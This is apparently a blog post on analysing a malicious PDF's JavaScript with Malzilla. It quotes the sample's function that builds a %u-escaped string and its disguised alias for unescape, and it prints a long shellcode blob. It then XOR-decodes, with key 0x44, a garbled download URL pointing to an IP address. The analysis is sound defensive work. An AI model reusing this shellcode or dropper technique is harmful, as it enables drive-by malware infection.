Doing some googling makes it look pretty easy, but most of the blogs and tutorials I found seem to have Javascript that contains an eval() or plainly obvious escaped unicode (%uXXXX%uXXXX sequences). This code doesn't seem to have that... or does it?
I spent some more time staring at it and some of it starts to make more sense, and I think I might be able to get it to give me the escaped unicode sequence.
function ONG5XToO(arg) {
var out = "";
for (var i=0; i<arg.length;i=i+4) {
var br1 = parseInt('0x'+arg[i] + arg[i+1], 16).toString(16);
var br2 = parseInt('0x'+arg[i+2] + arg[i+3], 16).toString(16);
if(br2.length == 1) { br2 = "0" + br2; };
if(br1.length == 1) { br1 = "0" + br1; };
out = out + "%u" + br1 + br2;
}
return out;
}
For instance this function above looks like it it used to build that unicode sequence, and it's called on the large mess of strings and regex's just after. Also, something I overlooked earlier, they are calling unescape() on that large string of unicode characters and trying to hide it by using the obfuscated name shown below:
function auHWvCNa() {
wVyLUt7Tb = unescape;
Spidermonkey is a tool that can parse Javascript and it used by many security professionals to do this kind of work. I played with it a little bit and unfortunately didn't get too far with it, and probably gave up too early. Another tool I found was Malzilla, a swiss-army knife for analyzing malicious javascript.
I pasted the javascript into Malzilla's Decoder tab, and clicked "Run Script". "Script Compiled", but nothing else. Instead of reading the manual, I start messing around. Eventually, I changed the wVyLUt7Tb in front of the suspected shellcode in function auHWvCNa() to an eval, and ran the script again. This time I got some results, although also a message about the script not being able to be compiled (maybe actually having something more than passing knowledge of Javascript may be useful ;) )
%u4141%u4149%u4949%u4941%u4949%u4949%ue890%u0000%u0000%u8359%u0cc1%u3180%u4144%u3980%u75c3%u83b3%ubb05%u3762%u2834%u0582%u7947%u8fac%u4444%ucd44%u2c83%ub9cd%ue056%uac13%u44bf%u4444%u2c14%u2a2b%u4444%u312c%u2836%u1029%u94bb%u252c%ua865%u14a0%ua6ac%u4444%ucd44%u2c82%u945d%u4692%uac13%u4491%u4444%ubb2c%u4444%u2e44%ubb04%u1494%u022c%ubb6b%u1381%u84ac%u4444%u1f44%u2e17%u2c04%u44bb%u4444%ubb17%u1494%u44ac%u4444%u1d44%u85c7%u054e%uc522%u1e7d%u311e%u05bc%u1705%u9675%u1616%ubb2c%u4444%u1744%u1615%u92bb%ubcc7%u3044%ud441%u1414%u75af%u2d2c%u4a6e%u1305%u38ac%u4444%u2e44%u2c21%u6a25%u3c21%ucf10%u6048%u18cf%u4860%u1715%u94bb%u2c12%ub30f%u452a%uac13%u4419%u4444%u1a1a%u442e%ubb12%u2e94%u2c28%u302a%u2820%ubb10%u6010%u2c60%u2fa5%u925d%uac14%u447b%u4444%u94bb%u7512%u2084%u74e5%u4444%u3c44%ucf48%u4804%u34cf%ue958%u04cf%uaf4c%ucf4d%u7004%u04c9%ucf38%u7804%u871a%ucd11%ucfa1%u4c01%u7516%u8596%u4786%u5476%uc404%u447c%ub131%u94cd%u8d1e%u4086%u1144%ua1cd%u1312%u8475%u19cf%ucf48%u4c31%ub3cd%u3247%ucf78%u3c0a%ubd45%u15cf%u1658%u15cf%u1660%u35cf%u4564%uddba%ue90e%u4706%u4c01%uac14%ubbf0%ubbbb%u9c7d%ub531%u01cf%ud64c%u451a%u9592%u45a4%u75b4%u4b8d%u4cf3%u851b%u46a5%u9545%ubd45%u45cf%u9445%u1a1b%u868d%u444c%u1e1e%u302c%u3430%u6b7e%u736b%u6a7d%u7d7d%u756a%u7777%u736a%u6b71%u3c2b%u2829%u350e%u6a06%u3c21%u7b21%u212a%u7933%u6277%u7931%u1b22%u1b77%u7475%u2762%u7927%u627b%u3037%u7779%u3132%u622d%u2930%u7479%u7474%u7574%u6276%u7936%u7d2f%u2a36%u3431%u2f3d%u622a%u7931%u1b22%u1b77%u7475%uc3c3%uc3c3%u3170
That looks more like what the tutorials are showing! Copy and pasting that into the Misc Decoders tab in Malzilla, and then click the Decode UCS2 (%u) button, go on over to the Hex tab. I wonder if this is the shellcode? I don't see a URL unfortunately, but sometimes these are further obfuscated.
Right clicking in the Hex tab of the Misc Decoders tab allows you to copy as hex, and then you can paste as hex into other tabs. In the Hex view you can dissemble the hex, as well as do an XOR search. Let's see if the URL is XORed then! Since I already know what the PDF is trying to download, I can search for the exe itself, but let's try "http". I used a max key of FFF. Hmmm, nothing. Let's try "thpt" (little endian order). Key Found! Excellent, I see a key of 44 is found, and pressing the Apply XOR button changes the view, and the URL becomes apparent.
thpt/:7/.9991.337./5xolmqJ.Bxe?een=w&3=u_f_301c&=c&?ts3=uv&imt0=0010&2=r9knrpuky&n=u_f_301‡‡‡‡u4DaDtDt
Well, enough of the URL to make me think this is definitely the shellcode. Now it can be further analyzed if required with a debugger or disassebler like IDA pro.
No comments:
Post a Comment